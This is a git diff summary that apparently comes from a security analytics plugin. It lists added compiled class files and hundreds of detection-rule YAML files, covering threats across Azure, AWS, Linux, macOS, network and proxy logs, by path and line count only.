.../TransportSearchDetectorAction.class | Bin 0 -> 7759 bytes ...uleAction$AsyncSearchRulesAction$1$1.class | Bin 0 -> 2744 bytes ...hRuleAction$AsyncSearchRulesAction$1.class | Bin 0 -> 3133 bytes ...eAction$AsyncSearchRulesAction$2$1$1.class | Bin 0 -> 3067 bytes ...uleAction$AsyncSearchRulesAction$2$1.class | Bin 0 -> 3346 bytes ...hRuleAction$AsyncSearchRulesAction$2.class | Bin 0 -> 2708 bytes ...uleAction$AsyncSearchRulesAction$3$1.class | Bin 0 -> 2533 bytes ...hRuleAction$AsyncSearchRulesAction$3.class | Bin 0 -> 3547 bytes ...hRuleAction$AsyncSearchRulesAction$4.class | Bin 0 -> 1722 bytes ...rchRuleAction$AsyncSearchRulesAction.class | Bin 0 -> 7201 bytes .../transport/TransportSearchRuleAction.class | Bin 0 -> 5845 bytes .../TransportUpdateIndexMappingsAction.class | Bin 0 -> 6290 bytes .../TransportValidateRulesAction.class | Bin 0 -> 6521 bytes .../util/AutoCorrelationsRepo.class | Bin 0 -> 4065 bytes .../util/CorrelationIndices.class | Bin 0 -> 8176 bytes .../util/CorrelationRuleIndices.class | Bin 0 -> 3966 bytes .../util/CustomLogTypeIndices.class | Bin 0 -> 5020 bytes .../util/DetectorIndices.class | Bin 0 -> 4978 bytes .../util/DetectorUtils$1.class | Bin 0 -> 2925 bytes .../util/DetectorUtils.class | Bin 0 -> 13378 bytes .../securityanalytics/util/FileUtils.class | Bin 0 -> 1768 bytes .../securityanalytics/util/IndexUtils.class | Bin 0 -> 11592 bytes .../util/MonitorService$1.class | Bin 0 -> 4446 bytes .../util/MonitorService.class | Bin 0 -> 3931 bytes .../util/RestHandlerUtils.class | Bin 0 -> 497 bytes .../util/RuleIndices$1$1.class | Bin 0 -> 3876 bytes .../util/RuleIndices$1.class | Bin 0 -> 4033 bytes .../securityanalytics/util/RuleIndices.class | Bin 0 -> 24226 bytes .../util/RuleTopicIndices.class | Bin 0 -> 8300 bytes .../util/RuleValidator.class | Bin 0 -> 11216 bytes .../util/SecurityAnalyticsException.class | Bin 0 -> 3739 bytes .../util/WorkflowService$1$1.class | Bin 0 -> 2046 bytes .../util/WorkflowService$1.class | Bin 0 -> 3777 bytes .../util/WorkflowService.class | Bin 0 -> 13079 bytes .../util/XContentUtils.class | Bin 0 -> 1637 bytes ..._signin_failure_bad_password_threshold.yml | 27 + .../azure_aadhybridhealth_adfs_new_server.yml | 27 + ...re_aadhybridhealth_adfs_service_delete.yml | 27 + .../azure_ad_bitlocker_key_retrieval.yml | 22 + ...evice_registration_or_join_without_mfa.yml | 24 + ..._ad_device_registration_policy_changes.yml | 22 + ..._ad_sign_ins_from_noncompliant_devices.yml | 21 + ...azure_ad_sign_ins_from_unknown_devices.yml | 24 + .../azure_ad_user_added_to_admin_role.yml | 26 + ...e_ad_users_added_to_device_admin_roles.yml | 27 + bin/main/rules/ad_ldap/win_ldap_recon.yml | 76 + .../apache_access/web_apache_segfault.yml | 21 + .../web_apache_threading_error.yml | 18 + ..._signin_failure_bad_password_threshold.yml | 27 + .../azure_aadhybridhealth_adfs_new_server.yml | 27 + ...re_aadhybridhealth_adfs_service_delete.yml | 27 + .../rules/azure/azure_account_lockout.yml | 21 + .../azure/azure_app_appid_uri_changes.yml | 24 + .../azure/azure_app_credential_added.yml | 23 + .../azure_app_credential_modification.yml | 22 + .../azure_app_device_code_authentication.yml | 27 + .../rules/azure/azure_app_owner_added.yml | 23 + .../azure/azure_app_ropc_authentication.yml | 24 + .../azure/azure_app_uri_modifications.yml | 24 + .../rules/azure/azure_application_deleted.yml | 24 + ...pplication_gateway_modified_or_deleted.yml | 24 + ...ion_security_group_modified_or_deleted.yml | 24 + .../azure/azure_blocked_account_attempt.yml | 23 + .../azure_change_to_authentication_method.yml | 22 + .../azure_conditional_access_failure.yml | 24 + ..._container_registry_created_or_deleted.yml | 27 + ...creating_number_of_resources_detection.yml | 22 + ..._device_no_longer_managed_or_compliant.yml | 22 + ...e_or_configuration_modified_or_deleted.yml | 26 + .../azure_dns_zone_modified_or_deleted.yml | 24 + .../rules/azure/azure_federation_modified.yml | 25 + .../azure_firewall_modified_or_deleted.yml | 23 + ...ll_rule_collection_modified_or_deleted.yml | 27 + .../azure_granting_permission_detection.yml | 21 + ...azure_keyvault_key_modified_or_deleted.yml | 34 + .../azure_keyvault_modified_or_deleted.yml | 29 + ...e_keyvault_secrets_modified_or_deleted.yml | 33 + .../azure_kubernetes_admission_controller.yml | 34 + ..._kubernetes_cluster_created_or_deleted.yml | 27 + .../rules/azure/azure_kubernetes_cronjob.yml | 34 + .../azure/azure_kubernetes_events_deleted.yml | 23 + ...azure_kubernetes_network_policy_change.yml | 30 + .../azure/azure_kubernetes_pods_deleted.yml | 22 + .../azure/azure_kubernetes_role_access.yml | 33 + ...rnetes_rolebinding_modified_or_deleted.yml | 30 + ...ernetes_secret_or_config_object_access.yml | 28 + ...es_service_account_modified_or_deleted.yml | 28 + .../azure/azure_login_to_disabled_account.yml | 22 + bin/main/rules/azure/azure_mfa_denies.yml | 22 + bin/main/rules/azure/azure_mfa_disabled.yml | 24 + .../rules/azure/azure_mfa_interrupted.yml | 25 + ...rk_firewall_policy_modified_or_deleted.yml | 25 + ...work_firewall_rule_modified_or_deleted.yml | 25 + ...re_network_p2s_vpn_modified_or_deleted.yml | 27 + ...e_network_security_modified_or_deleted.yml | 27 + ...ork_virtual_device_modified_or_deleted.yml | 32 + .../azure/azure_new_cloudshell_created.yml | 21 + ..._from_application_or_service_principal.yml | 24 + .../rules/azure/azure_rare_operations.yml | 27 + .../azure/azure_service_principal_created.yml | 22 + .../azure/azure_service_principal_removed.yml | 22 + ...permissions_elevation_via_activitylogs.yml | 21 + ...on_permissions_elevation_via_auditlogs.yml | 22 + .../azure/azure_suppression_rule_created.yml | 22 + ...re_unusual_authentication_interruption.yml | 28 + ...er_login_blocked_by_conditional_access.yml | 21 + ...re_virtual_network_modified_or_deleted.yml | 26 + ...ure_vpn_connection_modified_or_deleted.yml | 23 + .../aws_attached_malicious_lambda_layer.yml | 22 + .../aws_cloudtrail_disable_logging.yml | 26 + .../aws_config_disable_recording.yml | 23 + .../aws_create_load_balancer_layer.yml | 22 + .../cloudtrail/aws_ec2_disable_encryption.yml | 25 + .../cloudtrail/aws_ec2_download_userdata.yml | 25 + .../aws_ec2_startup_script_change.yml | 26 + .../cloudtrail/aws_ec2_vm_export_failure.yml | 29 + .../aws_ecs_task_definition_backdoor.yml | 30 + .../aws_efs_fileshare_modified_or_deleted.yml | 21 + ...fs_fileshare_mount_modified_or_deleted.yml | 22 + .../aws_eks_cluster_created_or_deleted.yml | 26 + ...aws_elasticache_security_group_created.yml | 24 + ...che_security_group_modified_or_deleted.yml | 28 + .../rules/cloudtrail/aws_enum_listing.yml | 23 + .../cloudtrail/aws_guardduty_disruption.yml | 23 + .../aws_iam_backdoor_users_keys.yml | 31 + ...aws_lambda_function_created_or_invoked.yml | 27 + .../rules/cloudtrail/aws_macic_evasion.yml | 36 + ...ssed_role_to_glue_development_endpoint.yml | 30 + .../aws_rds_change_master_password.yml | 24 + .../cloudtrail/aws_rds_public_db_restore.yml | 24 + .../cloudtrail/aws_root_account_usage.yml | 24 + ...te_53_domain_transferred_lock_disabled.yml | 25 + ..._domain_transferred_to_another_account.yml | 23 + .../aws_s3_data_management_tampering.yml | 36 + .../aws_securityhub_finding_evasion.yml | 30 + .../aws_snapshot_backup_exfiltration.yml | 24 + .../cloudtrail/aws_sts_assumerole_misuse.yml | 29 + .../aws_sts_getsessiontoken_misuse.yml | 27 + .../cloudtrail/aws_susp_saml_activity.yml | 33 + .../cloudtrail/aws_update_login_profile.yml | 31 + bin/main/rules/dns/net_dns_c2_detection.yml | 24 + ...s_external_service_interaction_domains.yml | 34 + bin/main/rules/dns/net_dns_high_bytes_out.yml | 20 + ...et_dns_high_null_records_requests_rate.yml | 22 + .../rules/dns/net_dns_high_requests_rate.yml | 22 + ...net_dns_high_txt_records_requests_rate.yml | 22 + .../rules/dns/net_dns_mal_cobaltstrike.yml | 26 + .../dns/net_dns_pua_cryptocoin_mining_xmr.yml | 41 + .../rules/dns/net_dns_susp_b64_queries.yml | 23 + .../rules/dns/net_dns_susp_telegram_api.yml | 24 + .../dns/net_dns_susp_txt_exec_strings.yml | 26 + .../net_dns_wannacry_killswitch_domain.yml | 26 + .../github/github_delete_action_invoked.yml | 32 + ...github_disable_high_risk_configuration.yml | 40 + ...d_outdated_dependency_or_vulnerability.yml | 40 + .../rules/github/github_new_org_member.yml | 34 + .../github/github_new_secret_created.yml | 34 + .../github_outside_collaborator_detected.yml | 35 + ...ub_self_hosted_runner_changes_detected.yml | 55 + .../gworkspace_application_removed.yml | 26 + .../gworkspace_granted_domain_api_access.yml | 25 + .../gworkspace/gworkspace_mfa_disabled.yml | 28 + .../gworkspace_role_modified_or_deleted.yml | 27 + .../gworkspace_role_privilege_deleted.yml | 24 + ...orkspace_user_granted_admin_privileges.yml | 26 + .../auditd/lnx_auditd_alter_bash_profile.yml | 35 + .../linux/auditd/lnx_auditd_audio_capture.yml | 27 + .../lnx_auditd_auditing_config_change.yml | 31 + .../auditd/lnx_auditd_binary_padding.yml | 30 + .../lnx_auditd_capabilities_discovery.yml | 29 + .../lnx_auditd_change_file_time_attr.yml | 29 + .../lnx_auditd_chattr_immutable_removal.yml | 24 + .../lnx_auditd_clipboard_collection.yml | 31 + .../lnx_auditd_clipboard_image_collection.yml | 32 + .../linux/auditd/lnx_auditd_coinminer.yml | 33 + .../auditd/lnx_auditd_create_account.yml | 23 + ...itd_cve_2021_3156_sudo_buffer_overflow.yml | 42 + ...21_3156_sudo_buffer_overflow_brutforce.yml | 29 + .../linux/auditd/lnx_auditd_cve_2021_4034.yml | 28 + .../auditd/lnx_auditd_data_compressed.yml | 31 + .../auditd/lnx_auditd_data_exfil_wget.yml | 25 + .../auditd/lnx_auditd_dd_delete_file.yml | 27 + .../lnx_auditd_disable_system_firewall.yml | 27 + .../lnx_auditd_file_or_folder_permissions.yml | 25 + .../auditd/lnx_auditd_find_cred_in_files.yml | 25 + .../lnx_auditd_hidden_files_directories.yml | 33 + ..._auditd_hidden_zip_files_steganography.yml | 29 + .../lnx_auditd_keylogging_with_pam_d.yml | 35 + .../auditd/lnx_auditd_ld_so_preload_mod.yml | 24 + .../auditd/lnx_auditd_load_module_insmod.yml | 27 + .../lnx_auditd_logging_config_change.yml | 30 + .../auditd/lnx_auditd_masquerading_crond.yml | 24 + .../lnx_auditd_network_service_scanning.yml | 32 + .../auditd/lnx_auditd_network_sniffing.yml | 31 + ..._scx_runasprovider_executeshellcommand.yml | 31 + .../lnx_auditd_password_policy_discovery.yml | 43 + .../auditd/lnx_auditd_pers_systemd_reload.yml | 28 + .../lnx_auditd_screencapture_import.yml | 37 + .../auditd/lnx_auditd_screencaputre_xwd.yml | 31 + .../lnx_auditd_split_file_into_pieces.yml | 23 + ...nx_auditd_steghide_embed_steganography.yml | 30 + ..._auditd_steghide_extract_steganography.yml | 28 + .../auditd/lnx_auditd_susp_c2_commands.yml | 21 + .../linux/auditd/lnx_auditd_susp_cmds.yml | 36 + .../auditd/lnx_auditd_susp_exe_folders.yml | 44 + .../lnx_auditd_susp_histfile_operations.yml | 36 + .../lnx_auditd_system_info_discovery.yml | 31 + .../lnx_auditd_system_info_discovery2.yml | 35 + .../lnx_auditd_system_shutdown_reboot.yml | 33 + .../lnx_auditd_systemd_service_creation.yml | 30 + ...d_unzip_hidden_zip_files_steganography.yml | 27 + .../auditd/lnx_auditd_user_discovery.yml | 26 + .../rules/linux/auditd/lnx_auditd_web_rce.yml | 25 + .../linux/builtin/lnx_buffer_overflows.yml | 23 + .../rules/linux/builtin/lnx_clear_syslog.yml | 28 + .../builtin/lnx_crontab_file_modification.yml | 22 + .../rules/linux/builtin/lnx_file_copy.yml | 26 + .../builtin/lnx_ldso_preload_injection.yml | 21 + ...nimbuspwn_privilege_escalation_exploit.yml | 23 + .../linux/builtin/lnx_proxy_connection.yml | 21 + .../lnx_pwnkit_local_privilege_escalation.yml | 23 + .../rules/linux/builtin/lnx_setgid_setuid.yml | 25 + .../builtin/lnx_shell_clear_cmd_history.yml | 43 + .../linux/builtin/lnx_shell_priv_esc_prep.yml | 71 + .../linux/builtin/lnx_shell_susp_commands.yml | 59 + .../builtin/lnx_shell_susp_log_entries.yml | 21 + .../builtin/lnx_shell_susp_rev_shells.yml | 45 + .../rules/linux/builtin/lnx_shellshock.yml | 24 + .../builtin/lnx_space_after_filename_.yml | 22 + .../linux/builtin/lnx_sudo_cve_2019_14287.yml | 25 + .../builtin/lnx_sudo_cve_2019_14287_user.yml | 31 + .../rules/linux/builtin/lnx_susp_dev_tcp.yml | 31 + .../rules/linux/builtin/lnx_susp_jexboss.yml | 23 + .../linux/builtin/lnx_symlink_etc_passwd.yml | 22 + .../file_create_lnx_cron_files.yml | 32 + .../file_create_lnx_doas_conf_creation.yml | 22 + .../modsecurity/modsec_mulitple_blocks.yml | 23 + ..._connection_lnx_back_connect_shell_dev.yml | 22 + ...onnection_lnx_crypto_mining_indicators.yml | 40 + bin/main/rules/linux/other/lnx_clamav.yml | 25 + .../lnx_security_tools_disabling_syslog.yml | 29 + .../linux/other/lnx_ssh_cve_2018_15473.yml | 22 + .../lnx_susp_failed_logons_single_source.yml | 25 + .../rules/linux/other/lnx_susp_guacamole.yml | 22 + bin/main/rules/linux/other/lnx_susp_named.yml | 24 + bin/main/rules/linux/other/lnx_susp_ssh.yml | 33 + bin/main/rules/linux/other/lnx_susp_vsftp.yml | 38 + .../proc_creation_lnx_at_command.yml | 23 + .../proc_creation_lnx_base64_decode.yml | 23 + ...ation_lnx_bpftrace_unsafe_option_usage.yml | 23 + .../proc_creation_lnx_cat_sudoers.yml | 24 + .../proc_creation_lnx_clear_logs.yml | 26 + .../proc_creation_lnx_clear_syslog.yml | 28 + ...proc_creation_lnx_clipboard_collection.yml | 31 + .../proc_creation_lnx_crypto_mining.yml | 38 + ...nx_cve_2022_26134_atlassian_confluence.yml | 40 + .../proc_creation_lnx_dd_file_overwrite.yml | 29 + .../proc_creation_lnx_doas_execution.yml | 22 + ...ation_lnx_file_and_directory_discovery.yml | 30 + .../proc_creation_lnx_file_deletion.yml | 23 + ..._creation_lnx_install_root_certificate.yml | 24 + .../proc_creation_lnx_local_account.yml | 34 + .../proc_creation_lnx_local_groups.yml | 25 + ..._creation_lnx_network_service_scanning.yml | 31 + .../proc_creation_lnx_nohup.yml | 20 + ...omigod_scx_runasprovider_executescript.yml | 30 + ..._scx_runasprovider_executeshellcommand.yml | 30 + .../proc_creation_lnx_process_discovery.yml | 24 + .../proc_creation_lnx_python_pty_spawn.yml | 29 + ...c_creation_lnx_remote_system_discovery.yml | 46 + ...oc_creation_lnx_schedule_task_job_cron.yml | 25 + ...eation_lnx_security_software_discovery.yml | 32 + ..._creation_lnx_security_tools_disabling.yml | 83 + ...oc_creation_lnx_susp_chmod_directories.yml | 27 + .../proc_creation_lnx_susp_history_delete.yml | 26 + .../proc_creation_lnx_susp_history_recon.yml | 26 + ...roc_creation_lnx_susp_interactive_bash.yml | 30 + .../proc_creation_lnx_susp_java_children.yml | 32 + .../proc_creation_lnx_susp_pipe_shell.yml | 28 + ...roc_creation_lnx_susp_recon_indicators.yml | 25 + ...roc_creation_lnx_system_info_discovery.yml | 29 + ...x_system_network_connections_discovery.yml | 27 + ..._creation_lnx_system_network_discovery.yml | 33 + .../proc_creation_lnx_webshell_detection.yml | 42 + ...crosoft365_activity_by_terminated_user.yml | 26 + ...5_activity_from_anonymous_ip_addresses.yml | 25 + ...ft365_activity_from_infrequent_country.yml | 25 + ..._data_exfiltration_to_unsanctioned_app.yml | 25 + .../microsoft365_from_susp_ip_addresses.yml | 27 + ...icrosoft365_impossible_travel_activity.yml | 25 + ...crosoft365_logon_from_risky_ip_address.yml | 25 + ...icrosoft365_new_federated_domain_added.yml | 27 + ...osoft365_potential_ransomware_activity.yml | 25 + .../m365/microsoft365_pst_export_alert.yml | 28 + ...alert_using_new_compliancesearchaction.yml | 28 + .../microsoft365_susp_inbox_forwarding.yml | 25 + ...usp_oauth_app_file_download_activities.yml | 24 + ...oft365_unusual_volume_of_file_deletion.yml | 25 + ...365_user_restricted_from_sending_email.yml | 25 + .../cisco/aaa/cisco_cli_clear_logs.yml | 28 + .../cisco/aaa/cisco_cli_collect_data.yml | 34 + .../cisco/aaa/cisco_cli_crypto_actions.yml | 31 + .../cisco/aaa/cisco_cli_disable_logging.yml | 28 + .../network/cisco/aaa/cisco_cli_discovery.yml | 45 + .../rules/network/cisco/aaa/cisco_cli_dos.yml | 27 + .../cisco/aaa/cisco_cli_file_deletion.yml | 28 + .../cisco/aaa/cisco_cli_input_capture.yml | 25 + .../cisco/aaa/cisco_cli_local_accounts.yml | 25 + .../cisco/aaa/cisco_cli_modify_config.yml | 34 + .../cisco/aaa/cisco_cli_moving_data.yml | 33 + .../network/cisco/aaa/cisco_cli_net_sniff.yml | 26 + .../net_firewall_high_dns_bytes_out.yml | 20 + .../net_firewall_high_dns_requests_rate.yml | 22 + .../net_firewall_susp_network_scan_by_ip.yml | 25 + ...net_firewall_susp_network_scan_by_port.yml | 25 + .../zeek_dce_rpc_domain_user_enumeration.yml | 35 + .../zeek_dce_rpc_mitre_bzar_execution.yml | 53 + .../zeek_dce_rpc_mitre_bzar_persistence.yml | 39 + ...rpc_potential_petit_potam_efs_rpc_call.yml | 38 + ...pc_printnightmare_print_driver_install.yml | 46 + .../zeek_dce_rpc_smb_spoolss_named_pipe.yml | 25 + ...zeek_default_cobalt_strike_certificate.yml | 26 + .../network/zeek/zeek_dns_mining_pools.yml | 105 + bin/main/rules/network/zeek/zeek_dns_nkn.yml | 28 + .../network/zeek/zeek_dns_susp_zbit_flag.yml | 71 + .../rules/network/zeek/zeek_dns_torproxy.yml | 52 + ...k_http_executable_download_from_webdav.yml | 27 + .../zeek/zeek_http_omigod_no_auth_rce.yml | 54 + .../zeek/zeek_http_webdav_put_request.yml | 28 + .../network/zeek/zeek_rdp_public_listener.yml | 47 + .../zeek_smb_converted_win_atsvc_task.yml | 27 + ..._smb_converted_win_impacket_secretdump.yml | 28 + .../zeek_smb_converted_win_lm_namedpipe.yml | 42 + .../zeek_smb_converted_win_susp_psexec.yml | 33 + ...verted_win_susp_raccess_sensitive_fext.yml | 39 + ...ransferring_files_with_credential_data.yml | 32 + .../network/zeek/zeek_susp_kerberos_rc4.yml | 25 + ...a_admin_role_assigned_to_user_or_group.yml | 26 + .../okta_admin_role_assignment_created.yml | 21 + .../rules/okta/okta_api_token_created.yml | 22 + .../rules/okta/okta_api_token_revoked.yml | 23 + .../okta_application_modified_or_deleted.yml | 25 + ...ion_sign_on_policy_modified_or_deleted.yml | 24 + .../okta/okta_mfa_reset_or_deactivated.yml | 27 + ...ta_network_zone_deactivated_or_deleted.yml | 25 + .../okta/okta_policy_modified_or_deleted.yml | 26 + .../okta_policy_rule_modified_or_deleted.yml | 25 + .../okta/okta_security_threat_detected.yml | 21 + .../okta/okta_unauthorized_access_to_app.yml | 22 + .../okta/okta_user_account_locked_out.yml | 23 + .../antivirus/av_exploiting.yml | 41 + .../antivirus/av_hacktool.yml | 29 + .../antivirus/av_password_dumper.yml | 41 + .../av_printernightmare_cve_2021_34527.yml | 29 + .../antivirus/av_ransomware.yml | 21 + .../antivirus/av_relevant_files.yml | 78 + .../antivirus/av_webshell.yml | 75 + .../django/appframework_django_exceptions.yml | 36 + .../python/app_python_sql_exceptions.yml | 25 + .../rpc_firewall_atsvc_lateral_movement.yml | 34 + .../rpc_firewall/rpc_firewall_atsvc_recon.yml | 31 + .../rpc_firewall_dcsync_attack.yml | 33 + .../rpc_firewall/rpc_firewall_efs_abuse.yml | 30 + .../rpc_firewall_eventlog_recon.yml | 27 + ...itaskschedulerservice_lateral_movement.yml | 42 + ...c_firewall_itaskschedulerservice_recon.yml | 37 + ...rpc_firewall_printing_lateral_movement.yml | 34 + .../rpc_firewall_remote_dcom_or_wmi.yml | 37 + ...ewall_remote_registry_lateral_movement.yml | 40 + .../rpc_firewall_remote_registry_recon.yml | 38 + ...c_firewall_remote_server_service_abuse.yml | 28 + ...rewall_remote_service_lateral_movement.yml | 30 + .../rpc_firewall_sasec_lateral_movement.yml | 34 + .../rpc_firewall/rpc_firewall_sasec_recon.yml | 30 + .../rpc_firewall_sharphound_recon_account.yml | 29 + ...rpc_firewall_sharphound_recon_sessions.yml | 29 + .../appframework_ruby_on_rails_exceptions.yml | 29 + .../spring/appframework_spring_exceptions.yml | 28 + .../sql/app_sqlinjection_errors.yml | 30 + .../others_apt/apt_silence_downloader_v3.yml | 39 + bin/main/rules/others_apt/apt_silence_eda.yml | 41 + ..._signin_failure_bad_password_threshold.yml | 27 + .../azure_aadhybridhealth_adfs_new_server.yml | 27 + ...re_aadhybridhealth_adfs_service_delete.yml | 27 + .../azure/azure_account_lockout.yml | 21 + .../azure_ad_bitlocker_key_retrieval.yml | 22 + ...evice_registration_or_join_without_mfa.yml | 24 + ..._ad_device_registration_policy_changes.yml | 22 + ..._ad_sign_ins_from_noncompliant_devices.yml | 21 + ...azure_ad_sign_ins_from_unknown_devices.yml | 24 + .../azure_ad_user_added_to_admin_role.yml | 26 + ...e_ad_users_added_to_device_admin_roles.yml | 27 + .../azure/azure_app_appid_uri_changes.yml | 24 + .../azure/azure_app_credential_added.yml | 23 + .../azure_app_credential_modification.yml | 22 + .../azure_app_device_code_authentication.yml | 27 + .../azure/azure_app_owner_added.yml | 23 + .../azure/azure_app_ropc_authentication.yml | 24 + .../azure/azure_app_uri_modifications.yml | 24 + .../azure/azure_application_deleted.yml | 24 + ...pplication_gateway_modified_or_deleted.yml | 24 + ...ion_security_group_modified_or_deleted.yml | 24 + .../azure/azure_blocked_account_attempt.yml | 23 + .../azure_change_to_authentication_method.yml | 22 + .../azure_conditional_access_failure.yml | 24 + ..._container_registry_created_or_deleted.yml | 27 + ...creating_number_of_resources_detection.yml | 22 + ..._device_no_longer_managed_or_compliant.yml | 22 + ...e_or_configuration_modified_or_deleted.yml | 26 + .../azure_dns_zone_modified_or_deleted.yml | 24 + .../azure/azure_federation_modified.yml | 25 + .../azure_firewall_modified_or_deleted.yml | 23 + ...ll_rule_collection_modified_or_deleted.yml | 27 + .../azure_granting_permission_detection.yml | 21 + ...azure_keyvault_key_modified_or_deleted.yml | 34 + .../azure_keyvault_modified_or_deleted.yml | 29 + ...e_keyvault_secrets_modified_or_deleted.yml | 33 + .../azure_kubernetes_admission_controller.yml | 34 + ..._kubernetes_cluster_created_or_deleted.yml | 27 + .../azure/azure_kubernetes_cronjob.yml | 34 + .../azure/azure_kubernetes_events_deleted.yml | 23 + ...azure_kubernetes_network_policy_change.yml | 30 + .../azure/azure_kubernetes_pods_deleted.yml | 22 + .../azure/azure_kubernetes_role_access.yml | 33 + ...rnetes_rolebinding_modified_or_deleted.yml | 30 + ...ernetes_secret_or_config_object_access.yml | 28 + ...es_service_account_modified_or_deleted.yml | 28 + .../azure/azure_login_to_disabled_account.yml | 22 + .../others_cloud/azure/azure_mfa_denies.yml | 22 + .../others_cloud/azure/azure_mfa_disabled.yml | 24 + .../azure/azure_mfa_interrupted.yml | 25 + ...rk_firewall_policy_modified_or_deleted.yml | 25 + ...work_firewall_rule_modified_or_deleted.yml | 25 + ...re_network_p2s_vpn_modified_or_deleted.yml | 27 + ...e_network_security_modified_or_deleted.yml | 27 + ...ork_virtual_device_modified_or_deleted.yml | 32 + .../azure/azure_new_cloudshell_created.yml | 21 + ..._from_application_or_service_principal.yml | 24 + .../azure/azure_rare_operations.yml | 27 + .../azure/azure_service_principal_created.yml | 22 + .../azure/azure_service_principal_removed.yml | 22 + ...permissions_elevation_via_activitylogs.yml | 21 + ...on_permissions_elevation_via_auditlogs.yml | 22 + .../azure/azure_suppression_rule_created.yml | 22 + ...re_unusual_authentication_interruption.yml | 28 + ...er_login_blocked_by_conditional_access.yml | 21 + ...re_virtual_network_modified_or_deleted.yml | 26 + ...ure_vpn_connection_modified_or_deleted.yml | 23 + .../gcp/gcp_bucket_enumeration.yml | 23 + .../gcp/gcp_bucket_modified_or_deleted.yml | 25 + ...lp_re_identifies_sensitive_information.yml | 21 + .../gcp/gcp_dns_zone_modified_or_deleted.yml | 23 + .../gcp_firewall_rule_modified_or_deleted.yml | 27 + ...cp_full_network_traffic_packet_capture.yml | 29 + .../gcp_kubernetes_admission_controller.yml | 36 + .../gcp/gcp_kubernetes_cronjob.yml | 27 + .../gcp/gcp_kubernetes_rolebinding.yml | 33 + ...kubernetes_secrets_modified_or_deleted.yml | 25 + ...cp_service_account_disabled_or_deleted.yml | 24 + .../gcp/gcp_service_account_modified.yml | 26 + .../gcp_sql_database_modified_or_deleted.yml | 26 + .../gcp_vpn_tunnel_modified_or_deleted.yml | 24 + .../gworkspace_application_removed.yml | 25 + .../gworkspace_granted_domain_api_access.yml | 23 + .../gworkspace/gworkspace_mfa_disabled.yml | 28 + .../gworkspace_role_modified_or_deleted.yml | 25 + .../gworkspace_role_privilege_deleted.yml | 22 + ...orkspace_user_granted_admin_privileges.yml | 25 + ...crosoft365_activity_by_terminated_user.yml | 23 + ...5_activity_from_anonymous_ip_addresses.yml | 24 + ...ft365_activity_from_infrequent_country.yml | 24 + ..._data_exfiltration_to_unsanctioned_app.yml | 24 + .../microsoft365_from_susp_ip_addresses.yml | 24 + ...icrosoft365_impossible_travel_activity.yml | 25 + ...crosoft365_logon_from_risky_ip_address.yml | 24 + ...icrosoft365_new_federated_domain_added.yml | 27 + ...osoft365_potential_ransomware_activity.yml | 24 + .../microsoft365_susp_inbox_forwarding.yml | 24 + ...usp_oauth_app_file_download_activities.yml | 23 + ...oft365_unusual_volume_of_file_deletion.yml | 24 + ...365_user_restricted_from_sending_email.yml | 24 + ...a_admin_role_assigned_to_user_or_group.yml | 24 + .../okta/okta_api_token_created.yml | 22 + .../okta/okta_api_token_revoked.yml | 22 + .../okta_application_modified_or_deleted.yml | 24 + ...ion_sign_on_policy_modified_or_deleted.yml | 24 + .../okta/okta_mfa_reset_or_deactivated.yml | 24 + ...ta_network_zone_deactivated_or_deleted.yml | 24 + .../okta/okta_policy_modified_or_deleted.yml | 26 + .../okta_policy_rule_modified_or_deleted.yml | 24 + .../okta/okta_security_threat_detected.yml | 21 + .../okta/okta_unauthorized_access_to_app.yml | 22 + .../okta/okta_user_account_locked_out.yml | 22 + .../onelogin_assumed_another_user.yml | 21 + .../onelogin/onelogin_user_account_locked.yml | 25 + .../default_credentials_usage.yml | 109 + .../firewall_cleartext_protocols.yml | 85 + .../group_modification_logging.yml | 61 + .../host_without_firewall.yml | 31 + .../netflow_cleartext_protocols.yml | 79 + .../workstation_was_locked.yml | 46 + .../file_event_macos_emond_launch_daemon.yml | 27 + .../file_event_macos_startup_items.yml | 25 + .../proc_creation_macos_applescript.yml | 23 + .../proc_creation_macos_base64_decode.yml | 23 + .../proc_creation_macos_binary_padding.yml | 28 + ...c_creation_macos_change_file_time_attr.yml | 28 + .../proc_creation_macos_clear_system_logs.yml | 28 + .../proc_creation_macos_create_account.yml | 23 + ...c_creation_macos_create_hidden_account.yml | 33 + ...roc_creation_macos_creds_from_keychain.yml | 30 + ..._creation_macos_disable_security_tools.yml | 43 + ...ion_macos_file_and_directory_discovery.yml | 32 + ...proc_creation_macos_find_cred_in_files.yml | 25 + .../proc_creation_macos_gui_input_capture.yml | 39 + .../proc_creation_macos_local_account.yml | 42 + .../proc_creation_macos_local_groups.yml | 33 + ...reation_macos_network_service_scanning.yml | 30 + .../proc_creation_macos_network_sniffing.yml | 25 + ...creation_macos_remote_system_discovery.yml | 46 + ..._creation_macos_schedule_task_job_cron.yml | 25 + .../proc_creation_macos_screencapture.yml | 23 + ...tion_macos_security_software_discovery.yml | 39 + ...oc_creation_macos_space_after_filename.yml | 23 + ..._creation_macos_split_file_into_pieces.yml | 22 + ...reation_macos_susp_histfile_operations.yml | 29 + ...ion_macos_susp_macos_firmware_activity.yml | 27 + ...s_system_network_connections_discovery.yml | 27 + ...reation_macos_system_network_discovery.yml | 33 + ..._creation_macos_system_shutdown_reboot.yml | 25 + ...creation_macos_xattr_gatekeeper_bypass.yml | 25 + bin/main/rules/others_proxy/proxy_apt40.yml | 27 + .../proxy_apt_domestic_kitten.yml | 26 + .../rules/others_proxy/proxy_baby_shark.yml | 20 + .../others_proxy/proxy_chafer_malware.yml | 25 + .../others_proxy/proxy_cobalt_amazon.yml | 32 + .../proxy_cobalt_malformed_uas.yml | 27 + .../rules/others_proxy/proxy_cobalt_ocsp.yml | 23 + .../others_proxy/proxy_cobalt_onedrive.yml | 27 + .../proxy_download_susp_dyndns.yml | 115 + .../proxy_download_susp_tlds_blacklist.yml | 115 + .../proxy_download_susp_tlds_whitelist.yml | 64 + .../proxy_downloadcradle_webdav.yml | 29 + .../proxy_empire_ua_uri_combos.yml | 30 + .../rules/others_proxy/proxy_empty_ua.yml | 27 + .../rules/others_proxy/proxy_ios_implant.yml | 32 + .../proxy_java_class_download.yml | 19 + .../others_proxy/proxy_powershell_ua.yml | 27 + bin/main/rules/others_proxy/proxy_pwndrop.yml | 27 + .../proxy_raw_paste_service_access.yml | 32 + .../proxy_susp_flash_download_loc.yml | 28 + .../rules/others_proxy/proxy_telegram_api.yml | 34 + .../rules/others_proxy/proxy_turla_comrat.yml | 23 + bin/main/rules/others_proxy/proxy_ua_apt.yml | 65 + .../proxy_ua_bitsadmin_susp_ip.yml | 32 + .../proxy_ua_bitsadmin_susp_tld.yml | 33 + .../others_proxy/proxy_ua_cryptominer.yml | 30 + .../others_proxy/proxy_ua_frameworks.yml | 58 + 